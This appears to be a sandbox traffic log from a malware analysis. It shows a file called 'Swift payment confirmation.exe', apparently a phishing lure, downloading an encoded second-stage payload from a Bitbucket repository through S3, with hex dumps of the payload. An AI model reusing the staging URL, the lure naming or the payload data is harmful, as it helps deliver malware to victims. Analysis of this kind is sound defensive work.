                                                                              2024-10-31 08:06:58 UTC187OUTGET /akeem4u/canter/downloads/233_Hherfkswbzh HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                              Host: bitbucket.org
                                                                              2024-10-31 08:06:58 UTC5307INHTTP/1.1 302 Found
                                                                              Date: Thu, 31 Oct 2024 08:06:58 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Content-Length: 0
                                                                              Server: AtlassianEdge
                                                                              Location: https://bbuseruploads.s3.amazonaws.com/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-51bf-40d2-8c89-83ab9690304a/233_Hherfkswbzh?response-content-disposition=attachment%3B%20filename%3D%22233_Hherfkswbzh%22&AWSAccessKeyId=ASIA6KOSE3BNHI54BTHA&Signature=tZ%2FwwJ1FN%2B1%2B9of%2FJeE%2Bo3BV4Ls%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJHMEUCIFSQnqGQH2JEqKJhomymNnCA4lYnl%2BQwEzXvtXq0kv5eAiEAzwxPi7%2FqtIduS1Y4GA0jCPQlS4JfP3JMCl51SCYtQhwqsAIIif%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNPNgKLBoJg8jVpiLCqEAi5vjLhoUXqOlKLnUE4wl75aM276pOHwyiPYxUuzjzqQA1B6E34B6OOSvX9lsRbi3LuXjpVmDTGcat73%2FcWzvA614Ma6TUDMKcSsazo27JULJRZ60HAvQ7Yunt8LD%2FQJa6KQ7ZNxzvc6Im2AB2zO8JFpXZv88sFixKhA48r6SwpoIz88YU5Xnr7RRc%2FcGRXaCf0kE5TOvVuhRKQjrWpgV5%2B3XwWgYItfw7g%2Fg07uObWaxd%2FrUrcnphxewukr1BGhYJb0b7RPPNZECMwI%2B6Rpgub3znYbt8xERbbjY20apm6JRP0ianWEOKjL4kwde4Jr5x2%2F02F%2BJ8VoBjfD%2FdKx4k1jafP8MJ31jLkGOp0BsobkkeqEKCksULQQEEm05vOtphj3NQN6JxFL1ca%2BqDpxc4FYHr%2FFeBn%2BuqLl2quhEkiq46Ben1DguLLCVBSRqgt [TRUNCATED]
                                                                              Expires: Thu, 31 Oct 2024 08:06:58 GMT
                                                                              Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                              X-Used-Mesh: False
                                                                              Vary: Accept-Language, Origin
                                                                              Content-Language: en
                                                                              X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                              X-Dc-Location: Micros-3
                                                                              X-Served-By: c01c4ed28dfb
                                                                              X-Version: 6cbe3b68176f
                                                                              X-Static-Version: 6cbe3b68176f
                                                                              X-Request-Count: 3753
                                                                              X-Render-Time: 0.04803323745727539
                                                                              X-B3-Traceid: a35ae47f6bce4d45a214b59af2fbf7ab
                                                                              X-B3-Spanid: 0012cd5249c9b853
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Content-Security-Policy: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com ws [TRUNCATED]
                                                                              X-Usage-Quota-Remaining: 999085.364
                                                                              X-Usage-Request-Cost: 929.03
                                                                              X-Usage-User-Time: 0.019758
                                                                              X-Usage-System-Time: 0.008113
                                                                              X-Usage-Input-Ops: 0
                                                                              X-Usage-Output-Ops: 0
                                                                              Age: 0
                                                                              X-Cache: MISS
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Xss-Protection: 1; mode=block
                                                                              Atl-Traceid: a35ae47f6bce4d45a214b59af2fbf7ab
                                                                              Atl-Request-Id: a35ae47f-6bce-4d45-a214-b59af2fbf7ab
                                                                              Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                              Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                              Server-Timing: atl-edge;dur=172,atl-edge-internal;dur=5,atl-edge-upstream;dur=171,atl-edge-pop;desc="aws-eu-central-1"
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.54970652.217.102.2284431968C:\Users\user\Desktop\Swift payment confirmation.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-31 08:06:59 UTC1293OUTGET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-51bf-40d2-8c89-83ab9690304a/233_Hherfkswbzh?response-content-disposition=attachment%3B%20filename%3D%22233_Hherfkswbzh%22&AWSAccessKeyId=ASIA6KOSE3BNHI54BTHA&Signature=tZ%2FwwJ1FN%2B1%2B9of%2FJeE%2Bo3BV4Ls%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJHMEUCIFSQnqGQH2JEqKJhomymNnCA4lYnl%2BQwEzXvtXq0kv5eAiEAzwxPi7%2FqtIduS1Y4GA0jCPQlS4JfP3JMCl51SCYtQhwqsAIIif%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNPNgKLBoJg8jVpiLCqEAi5vjLhoUXqOlKLnUE4wl75aM276pOHwyiPYxUuzjzqQA1B6E34B6OOSvX9lsRbi3LuXjpVmDTGcat73%2FcWzvA614Ma6TUDMKcSsazo27JULJRZ60HAvQ7Yunt8LD%2FQJa6KQ7ZNxzvc6Im2AB2zO8JFpXZv88sFixKhA48r6SwpoIz88YU5Xnr7RRc%2FcGRXaCf0kE5TOvVuhRKQjrWpgV5%2B3XwWgYItfw7g%2Fg07uObWaxd%2FrUrcnphxewukr1BGhYJb0b7RPPNZECMwI%2B6Rpgub3znYbt8xERbbjY20apm6JRP0ianWEOKjL4kwde4Jr5x2%2F02F%2BJ8VoBjfD%2FdKx4k1jafP8MJ31jLkGOp0BsobkkeqEKCksULQQEEm05vOtphj3NQN6JxFL1ca%2BqDpxc4FYHr%2FFeBn%2BuqLl2quhEkiq46Ben1DguLLCVBSRqgtlRbI5gEDRpi7ahaj02LzU0cUHpJaeveVZ5yc%2FzTJew [TRUNCATED]
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                              Host: bbuseruploads.s3.amazonaws.com
                                                                              2024-10-31 08:06:59 UTC544INHTTP/1.1 200 OK
                                                                              x-amz-id-2: a8kyaIYRKgimOZ2WVH4HdbcidJLv5mvtLbDpLTv5Qdmbt0n4RJdM4v/DssV2L+fBhdxCDKjWmm0=
                                                                              x-amz-request-id: VQ33RNCZVX21JWBK
                                                                              Date: Thu, 31 Oct 2024 08:07:00 GMT
                                                                              Last-Modified: Sun, 27 Oct 2024 21:53:04 GMT
                                                                              ETag: "271a5d4a7e33f8c487190f127c5e2f43"
                                                                              x-amz-server-side-encryption: AES256
                                                                              x-amz-version-id: iLAYpg_EnWYHrKq5hXoEQZgnva5dDdpK
                                                                              Content-Disposition: attachment; filename="233_Hherfkswbzh"
                                                                              Accept-Ranges: bytes
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 383260
                                                                              Server: AmazonS3
                                                                              Connection: close
                                                                              2024-10-31 08:06:59 UTC16384INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 50 45 52 45 6b 47 53 55 50 4a 42 55 59 46 79 49 69 4a 79 45 68 45 78 77 55 45 42 4d 51 47 43 63 6d 49 78 38 62 4a 51 34 65 46 79 4d 65 48 78 73 68 48 42 59 63 4a 78 63 6e 44 69 41 4f 46 78 41 6e 49 69 45 6e 46 52 4d 54 46 79 45 4f 46 52 59 65 48 78 67 69 4a 79 63 68 48 68 6f 4f 49 42 38 64 48 52 6b 53 4a 52 63 52 49 43 51 55 4a 79 49 6e 47 79 55 4f 47 68 45 5a 4a 78 45 69 4a 68 71 6d 72 71 56 5a 49 36 65 78 53 31 4d 56 45 68 38 54 47 43 41 6b 44 79 63 56 70 71 36 6c 57 53 4f 6e 73 55 75 36 74 4c 53 6e 72 4b 43 36 70 37 43 7a 73 71 57 6c 6f 71 53 6b 74 71 2b 33 75 37 61 37 73 36 4b 68 70 71 71 75 6f 4c 6d 70 73 71 61 70 71 71 36 6b 72 37 47 76 6f 72 4b 69 75 61 75 35 73 72 75 69 70 61 53 69 73 4c 61 32 73 71 53 35 73 4c 47
                                                                              Data Ascii: pq6lWSOnsUsPEREkGSUPJBUYFyIiJyEhExwUEBMQGCcmIx8bJQ4eFyMeHxshHBYcJxcnDiAOFxAnIiEnFRMTFyEOFRYeHxgiJychHhoOIB8dHRkSJRcRICQUJyInGyUOGhEZJxEiJhqmrqVZI6exS1MVEh8TGCAkDycVpq6lWSOnsUu6tLSnrKC6p7CzsqWloqSktq+3u7a7s6KhpqquoLmpsqapqq6kr7GvorKiuau5sruipaSisLa2sqS5sLG
                                                                              2024-10-31 08:06:59 UTC480INData Raw: 33 70 67 56 64 78 6d 69 4a 61 77 4e 77 62 50 4c 6c 64 67 6c 6b 45 79 67 6d 4e 4b 70 65 38 33 66 51 64 6e 32 34 46 4d 56 37 44 30 58 78 78 43 4f 53 6b 42 45 74 56 65 62 4c 56 4b 6b 35 70 75 44 33 52 31 48 45 76 65 37 68 66 2f 4f 44 6e 47 6f 48 66 76 65 67 75 71 53 52 71 4b 7a 4b 53 44 64 35 30 7a 51 47 37 68 50 74 71 63 6b 79 72 4a 55 34 4e 61 4a 72 63 6b 64 53 6a 49 61 2b 58 6c 58 31 31 6f 6b 31 38 31 73 32 71 6a 35 52 4d 72 4c 74 4b 54 7a 51 75 63 4b 38 46 37 38 75 59 5a 36 37 73 4a 43 65 70 39 67 74 47 7a 75 6f 58 6a 63 63 4c 55 5a 33 32 41 39 56 64 65 65 54 2f 61 61 2b 72 38 61 56 6d 34 41 4b 37 62 71 30 69 71 68 54 50 46 61 43 6c 35 63 76 6e 2b 6d 55 34 6d 43 37 77 34 4e 43 62 64 75 39 7a 6c 31 33 38 51 54 43 4c 34 4c 36 77 5a 68 2b 49 43 6e 74 43 58
                                                                              Data Ascii: 3pgVdxmiJawNwbPLldglkEygmNKpe83fQdn24FMV7D0XxxCOSkBEtVebLVKk5puD3R1HEve7hf/ODnGoHfveguqSRqKzKSDd50zQG7hPtqckyrJU4NaJrckdSjIa+XlX11ok181s2qj5RMrLtKTzQucK8F78uYZ67sJCep9gtGzuoXjccLUZ32A9VdeeT/aa+r8aVm4AK7bq0iqhTPFaCl5cvn+mU4mC7w4NCbdu9zl138QTCL4L6wZh+ICntCX
                                                                              2024-10-31 08:06:59 UTC16384INData Raw: 53 47 64 4a 45 54 56 56 45 72 70 30 53 74 52 56 75 50 66 49 7a 6e 30 79 72 58 68 72 44 37 7a 6d 38 6a 61 49 4c 35 44 56 56 4b 44 67 52 62 53 76 58 4e 4c 4d 77 41 39 61 33 48 62 37 46 30 6d 44 5a 6e 6e 44 75 37 32 56 4f 6a 36 5a 74 37 47 65 7a 41 4b 70 61 38 36 33 65 35 6c 32 65 36 2f 31 55 75 70 4c 50 36 2b 48 58 4a 30 46 64 64 4e 58 4c 70 7a 6d 6a 5a 55 70 67 72 63 59 6e 64 59 73 30 6c 4b 4e 2f 30 4f 6c 42 64 75 6a 6d 53 39 31 52 45 55 63 34 43 73 38 66 43 4b 79 36 66 6b 32 77 6f 6e 4c 56 77 4f 4e 78 55 63 6f 4a 4e 79 51 57 53 64 68 61 41 4e 43 70 34 62 35 64 5a 58 47 37 31 33 57 4c 6f 44 42 4f 70 6e 75 43 35 33 6e 73 76 73 6b 47 43 79 6c 37 38 32 56 36 43 54 48 54 72 32 2f 32 39 2b 64 71 32 71 47 45 64 67 65 65 4e 4d 46 61 79 45 50 4e 48 4d 57 59 72 73
                                                                              Data Ascii: SGdJETVVErp0StRVuPfIzn0yrXhrD7zm8jaIL5DVVKDgRbSvXNLMwA9a3Hb7F0mDZnnDu72VOj6Zt7GezAKpa863e5l2e6/1UupLP6+HXJ0FddNXLpzmjZUpgrcYndYs0lKN/0OlBdujmS91REUc4Cs8fCKy6fk2wonLVwONxUcoJNyQWSdhaANCp4b5dZXG713WLoDBOpnuC53nsvskGCyl782V6CTHTr2/29+dq2qGEdgeeNMFayEPNHMWYrs
                                                                              2024-10-31 08:06:59 UTC1024INData Raw: 6a 48 64 58 64 38 35 71 57 6c 48 68 2f 66 2b 59 2f 30 4b 2b 35 78 36 6a 6e 36 4f 4a 71 32 68 79 51 55 45 71 74 4b 7a 71 4a 49 2b 56 69 2b 47 62 4a 75 67 6f 7a 4a 6a 5a 32 59 42 55 46 61 45 36 4a 56 65 55 77 59 6d 72 77 35 6a 36 7a 55 62 36 57 7a 6b 59 52 32 56 4a 61 41 71 76 6f 6a 31 36 38 6e 36 31 6e 46 69 34 7a 62 47 66 68 32 45 64 68 44 7a 2f 63 4f 6f 6f 63 6d 6f 4e 4f 42 66 50 33 75 6e 37 62 72 45 46 4c 6f 74 75 79 53 70 69 56 65 33 2b 45 54 52 34 4d 33 6b 43 4a 74 78 56 78 65 36 6b 35 59 53 62 65 56 4d 54 6c 74 66 31 33 44 57 6b 79 76 6e 5a 45 45 77 2f 51 4c 54 31 4c 38 65 34 5a 6f 37 6c 68 6f 79 30 68 62 73 4e 59 6a 42 4d 76 4d 53 45 49 75 49 50 56 4e 52 64 39 4f 33 2f 6a 6d 4c 4e 4d 44 61 4b 53 54 6d 53 46 73 71 66 42 7a 50 51 6b 33 47 68 41 69 37
                                                                              Data Ascii: jHdXd85qWlHh/f+Y/0K+5x6jn6OJq2hyQUEqtKzqJI+Vi+GbJugozJjZ2YBUFaE6JVeUwYmrw5j6zUb6WzkYR2VJaAqvoj168n61nFi4zbGfh2EdhDz/cOoocmoNOBfP3un7brEFLotuySpiVe3+ETR4M3kCJtxVxe6k5YSbeVMTltf13DWkyvnZEEw/QLT1L8e4Zo7lhoy0hbsNYjBMvMSEIuIPVNRd9O3/jmLNMDaKSTmSFsqfBzPQk3GhAi7
                                                                              2024-10-31 08:06:59 UTC16384INData Raw: 78 57 56 6b 71 54 4f 63 72 39 73 53 43 50 78 58 33 51 6a 2f 61 47 34 7a 54 50 73 46 73 4f 63 75 6a 50 6a 55 45 61 48 45 76 42 65 76 75 30 57 33 59 48 77 45 54 69 6e 41 50 41 41 74 46 6e 52 34 35 65 52 46 4c 63 32 36 6a 61 54 44 49 66 59 51 43 44 77 55 79 73 6c 46 48 48 78 42 51 35 48 76 6b 5a 43 75 6b 66 69 74 42 5a 43 38 69 75 35 79 6d 59 39 35 4b 33 69 46 47 74 57 78 45 70 45 6c 59 4b 65 31 69 6d 61 6e 6a 68 61 50 74 36 73 58 42 57 4b 45 58 68 57 7a 4c 77 54 33 41 52 52 70 6b 52 35 36 72 2b 31 4a 72 41 66 32 56 75 62 38 79 6e 50 61 44 77 4e 47 50 76 6c 6d 38 4f 51 4e 49 79 75 56 62 61 48 30 46 51 59 57 38 55 44 54 4d 50 58 61 48 75 35 75 59 30 67 4c 4c 62 33 71 50 43 6c 53 2f 44 34 4b 32 7a 48 2f 33 75 2f 39 75 30 33 49 77 67 6c 43 6c 4c 51 69 42 62 39
                                                                              Data Ascii: xWVkqTOcr9sSCPxX3Qj/aG4zTPsFsOcujPjUEaHEvBevu0W3YHwETinAPAAtFnR45eRFLc26jaTDIfYQCDwUyslFHHxBQ5HvkZCukfitBZC8iu5ymY95K3iFGtWxEpElYKe1imanjhaPt6sXBWKEXhWzLwT3ARRpkR56r+1JrAf2Vub8ynPaDwNGPvlm8OQNIyuVbaH0FQYW8UDTMPXaHu5uY0gLLb3qPClS/D4K2zH/3u/9u03IwglClLQiBb9
                                                                              2024-10-31 08:06:59 UTC1024INData Raw: 2f 57 57 50 4f 36 43 68 58 4d 6e 4c 34 72 57 37 2b 79 4f 78 36 4a 75 79 75 57 55 52 46 70 67 4a 46 39 41 56 6d 6f 45 36 6e 46 37 76 47 48 71 5a 64 36 4d 49 74 5a 2b 35 74 56 62 75 63 38 6e 2f 70 4c 6d 59 4c 4e 37 38 56 64 70 69 44 6c 7a 38 38 6f 38 59 39 6b 59 66 4e 56 50 63 4b 76 2b 55 7a 39 52 74 53 6b 53 34 58 49 6d 4b 44 66 52 6f 56 65 41 63 61 4a 30 36 59 61 2f 43 38 50 65 31 74 69 33 74 35 66 69 58 77 2f 76 77 76 6d 4b 52 4d 30 45 77 53 48 4a 6c 71 73 6d 4d 46 73 59 6d 63 56 66 4c 52 76 4e 63 4d 61 71 79 58 66 35 72 6a 4d 31 63 39 62 39 30 6d 55 38 44 36 53 38 6c 41 4b 53 71 38 6f 39 56 62 68 6a 35 44 50 32 4a 49 72 43 73 39 70 46 51 67 6f 35 5a 77 68 56 62 59 34 45 69 54 44 32 56 55 32 6b 58 79 76 43 62 77 34 53 61 59 45 30 36 46 4e 6f 47 45 37 67
                                                                              Data Ascii: /WWPO6ChXMnL4rW7+yOx6JuyuWURFpgJF9AVmoE6nF7vGHqZd6MItZ+5tVbuc8n/pLmYLN78VdpiDlz88o8Y9kYfNVPcKv+Uz9RtSkS4XImKDfRoVeAcaJ06Ya/C8Pe1ti3t5fiXw/vwvmKRM0EwSHJlqsmMFsYmcVfLRvNcMaqyXf5rjM1c9b90mU8D6S8lAKSq8o9Vbhj5DP2JIrCs9pFQgo5ZwhVbY4EiTD2VU2kXyvCbw4SaYE06FNoGE7g
                                                                              2024-10-31 08:06:59 UTC1795INData Raw: 71 34 61 4b 49 4e 30 49 53 73 55 41 62 54 54 52 57 6f 66 48 75 6c 77 47 2f 58 76 53 4d 4c 66 6c 6c 4c 55 63 61 79 2f 45 51 69 33 55 55 56 4f 4b 47 68 2f 62 32 4c 34 6d 64 30 64 37 68 6e 39 53 55 52 52 42 4a 46 47 50 4a 4b 68 68 54 75 58 67 58 6f 49 4e 76 31 64 44 53 6a 6b 77 47 42 34 4e 37 72 72 44 49 67 4c 6b 4c 42 63 72 4e 6d 79 76 58 46 4e 47 72 30 63 6b 39 2b 50 45 42 4f 4a 6b 46 57 4a 50 6f 63 37 6f 37 53 6a 78 77 70 48 68 6d 63 6d 6d 72 36 37 51 65 35 6a 57 57 31 75 65 63 45 4e 56 76 45 64 30 42 35 6f 38 77 51 75 6b 6d 30 31 78 66 71 79 46 4c 58 39 4a 31 37 34 35 50 69 4d 43 75 5a 73 78 56 74 2b 39 79 6e 45 46 7a 33 42 38 64 45 68 75 45 78 6a 41 45 4f 59 73 64 47 53 43 66 66 6e 52 47 6b 2f 6e 7a 54 31 6c 57 72 2b 42 39 30 65 78 79 64 44 5a 68 36 6e
                                                                              Data Ascii: q4aKIN0ISsUAbTTRWofHulwG/XvSMLfllLUcay/EQi3UUVOKGh/b2L4md0d7hn9SURRBJFGPJKhhTuXgXoINv1dDSjkwGB4N7rrDIgLkLBcrNmyvXFNGr0ck9+PEBOJkFWJPoc7o7SjxwpHhmcmmr67Qe5jWW1uecENVvEd0B5o8wQukm01xfqyFLX9J1745PiMCuZsxVt+9ynEFz3B8dEhuExjAEOYsdGSCffnRGk/nzT1lWr+B90exydDZh6n
                                                                              2024-10-31 08:06:59 UTC16384INData Raw: 6e 67 4e 4e 57 6e 6e 77 46 67 63 71 4c 73 63 4e 2f 61 4d 77 38 78 68 48 6f 78 57 4e 52 66 4f 6c 64 71 42 4c 44 74 48 54 52 77 56 6f 35 4e 4d 66 74 2f 4a 54 2f 6a 4a 79 72 57 68 72 54 49 71 78 2f 44 5a 39 46 37 4e 32 6e 4d 56 41 33 79 74 53 78 68 43 52 52 69 6b 42 36 37 31 56 56 72 50 54 73 4e 64 45 63 57 4c 43 78 47 79 6e 75 37 74 5a 68 74 47 62 7a 75 2b 39 7a 58 35 44 4a 5a 2b 78 70 4d 56 5a 54 50 50 73 74 4f 62 70 39 53 47 47 64 4c 62 57 61 67 6e 42 75 63 45 38 57 69 58 6a 75 43 7a 4a 57 65 5a 41 38 69 56 4b 6b 42 6e 34 34 77 4e 44 70 39 4c 4d 32 41 78 58 5a 6a 52 6d 37 79 65 5a 75 73 53 31 4b 4d 49 4c 74 30 47 4c 67 51 6f 55 30 49 47 59 2b 36 4f 67 74 64 6a 52 6c 57 4c 6a 77 48 2b 6e 52 63 31 51 4b 76 4e 61 45 55 44 4e 38 30 69 64 7a 53 39 6b 36 2f 38
                                                                              Data Ascii: ngNNWnnwFgcqLscN/aMw8xhHoxWNRfOldqBLDtHTRwVo5NMft/JT/jJyrWhrTIqx/DZ9F7N2nMVA3ytSxhCRRikB671VVrPTsNdEcWLCxGynu7tZhtGbzu+9zX5DJZ+xpMVZTPPstObp9SGGdLbWagnBucE8WiXjuCzJWeZA8iVKkBn44wNDp9LM2AxXZjRm7yeZusS1KMILt0GLgQoU0IGY+6OgtdjRlWLjwH+nRc1QKvNaEUDN80idzS9k6/8
                                                                              2024-10-31 08:07:00 UTC1024INData Raw: 64 61 39 70 69 68 55 56 78 45 4f 4f 6d 4e 54 47 77 67 5a 72 50 6b 46 49 73 6e 68 74 50 4b 6e 4f 55 4e 57 79 32 73 55 6a 32 6f 32 56 4c 4a 34 48 69 47 31 33 49 6a 38 4b 67 54 79 61 6a 31 36 63 4f 30 56 5a 61 63 52 79 2b 45 4e 43 7a 53 6b 4e 58 51 32 4d 68 79 6a 43 39 32 58 6a 69 36 42 50 37 59 69 75 56 4b 76 48 59 34 46 69 63 4c 73 79 45 6f 69 63 62 2f 67 74 68 50 35 52 54 76 62 64 4f 63 68 65 33 2b 30 4c 61 41 61 4c 59 4b 6e 41 6d 77 5a 47 43 6d 6a 46 41 58 51 36 2b 50 61 58 73 31 6e 76 54 6c 45 45 65 42 51 30 6d 47 66 32 68 46 61 54 6d 65 43 49 35 72 78 71 4a 41 30 2f 6f 71 52 66 54 62 4c 73 63 45 76 6f 58 4f 58 43 64 76 4d 73 54 41 2f 47 52 53 4e 33 51 44 65 56 4e 6f 5a 39 4e 36 48 57 46 62 33 4c 45 2b 72 39 55 38 59 6a 67 56 53 53 4b 56 4c 48 67 2f 72
                                                                              Data Ascii: da9pihUVxEOOmNTGwgZrPkFIsnhtPKnOUNWy2sUj2o2VLJ4HiG13Ij8KgTyaj16cO0VZacRy+ENCzSkNXQ2MhyjC92Xji6BP7YiuVKvHY4FicLsyEoicb/gthP5RTvbdOche3+0LaAaLYKnAmwZGCmjFAXQ6+PaXs1nvTlEEeBQ0mGf2hFaTmeCI5rxqJA0/oqRfTbLscEvoXOXCdvMsTA/GRSN3QDeVNoZ9N6HWFb3LE+r9U8YjgVSSKVLHg/r
                                                                              2024-10-31 08:07:00 UTC16384INData Raw: 69 61 76 71 73 4e 49 58 55 73 4e 71 70 59 48 49 42 5a 7a 62 6f 36 58 66 7a 52 54 39 4c 6e 68 68 4e 33 63 52 4b 4f 43 4a 70 76 76 69 56 48 77 42 2b 76 6b 67 6d 48 6b 6b 7a 39 4b 41 2f 39 62 38 67 69 45 55 71 76 5a 48 34 47 41 69 6d 7a 6a 55 54 49 79 42 47 73 48 4a 2b 39 32 77 53 7a 5a 4b 58 2b 52 58 32 63 76 4f 6b 50 74 52 62 64 79 6c 6c 44 38 53 70 33 32 48 66 42 7a 46 79 63 4a 6d 7a 4f 49 65 64 39 45 72 4a 51 4e 33 42 4a 61 78 36 73 55 72 70 43 4e 7a 55 77 31 6b 70 6b 4a 50 62 62 32 6b 57 32 64 65 33 36 38 62 4b 45 55 36 38 48 74 6c 6a 6c 4d 38 56 48 38 67 69 75 6e 5a 34 50 39 75 45 52 61 57 67 7a 73 69 31 75 30 6d 34 67 46 44 72 62 36 35 59 2b 4e 2f 53 5a 50 51 79 4a 7a 30 4f 37 77 45 68 53 68 63 4f 53 63 36 74 30 6f 49 6d 6d 74 74 73 4f 70 43 37 64 74
                                                                              Data Ascii: iavqsNIXUsNqpYHIBZzbo6XfzRT9LnhhN3cRKOCJpvviVHwB+vkgmHkkz9KA/9b8giEUqvZH4GAimzjUTIyBGsHJ+92wSzZKX+RX2cvOkPtRbdyllD8Sp32HfBzFycJmzOIed9ErJQN3BJax6sUrpCNzUw1kpkJPbb2kW2de368bKEU68HtljlM8VH8giunZ4P9uERaWgzsi1u0m4gFDrb65Y+N/SZPQyJz0O7wEhShcOSc6t0oImmttsOpC7dt


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.549708185.166.143.504431968C:\Users\user\Desktop\Swift payment confirmation.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-31 08:07:02 UTC187OUTGET /akeem4u/canter/downloads/233_Hherfkswbzh HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                              Host: bitbucket.org
                                                                              2024-10-31 08:07:02 UTC5308INHTTP/1.1 302 Found
                                                                              Date: Thu, 31 Oct 2024 08:07:02 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Content-Length: 0
                                                                              Server: AtlassianEdge
                                                                              Location: https://bbuseruploads.s3.amazonaws.com/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-51bf-40d2-8c89-83ab9690304a/233_Hherfkswbzh?response-content-disposition=attachment%3B%20filename%3D%22233_Hherfkswbzh%22&AWSAccessKeyId=ASIA6KOSE3BNHI54BTHA&Signature=tZ%2FwwJ1FN%2B1%2B9of%2FJeE%2Bo3BV4Ls%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJHMEUCIFSQnqGQH2JEqKJhomymNnCA4lYnl%2BQwEzXvtXq0kv5eAiEAzwxPi7%2FqtIduS1Y4GA0jCPQlS4JfP3JMCl51SCYtQhwqsAIIif%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNPNgKLBoJg8jVpiLCqEAi5vjLhoUXqOlKLnUE4wl75aM276pOHwyiPYxUuzjzqQA1B6E34B6OOSvX9lsRbi3LuXjpVmDTGcat73%2FcWzvA614Ma6TUDMKcSsazo27JULJRZ60HAvQ7Yunt8LD%2FQJa6KQ7ZNxzvc6Im2AB2zO8JFpXZv88sFixKhA48r6SwpoIz88YU5Xnr7RRc%2FcGRXaCf0kE5TOvVuhRKQjrWpgV5%2B3XwWgYItfw7g%2Fg07uObWaxd%2FrUrcnphxewukr1BGhYJb0b7RPPNZECMwI%2B6Rpgub3znYbt8xERbbjY20apm6JRP0ianWEOKjL4kwde4Jr5x2%2F02F%2BJ8VoBjfD%2FdKx4k1jafP8MJ31jLkGOp0BsobkkeqEKCksULQQEEm05vOtphj3NQN6JxFL1ca%2BqDpxc4FYHr%2FFeBn%2BuqLl2quhEkiq46Ben1DguLLCVBSRqgt [TRUNCATED]
                                                                              Expires: Thu, 31 Oct 2024 08:07:02 GMT
                                                                              Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                              X-Used-Mesh: False
                                                                              Vary: Accept-Language, Origin
                                                                              Content-Language: en
                                                                              X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                              X-Dc-Location: Micros-3
                                                                              X-Served-By: 8e424940a51d
                                                                              X-Version: 6cbe3b68176f
                                                                              X-Static-Version: 6cbe3b68176f
                                                                              X-Request-Count: 591
                                                                              X-Render-Time: 0.058461904525756836
                                                                              X-B3-Traceid: deec59e3d6f34e328661d9925ec7ff9a
                                                                              X-B3-Spanid: e215df6d133f0e7b
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Content-Security-Policy: base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.pr [TRUNCATED]
                                                                              X-Usage-Quota-Remaining: 998995.168
                                                                              X-Usage-Request-Cost: 1022.37
                                                                              X-Usage-User-Time: 0.019882
                                                                              X-Usage-System-Time: 0.010789
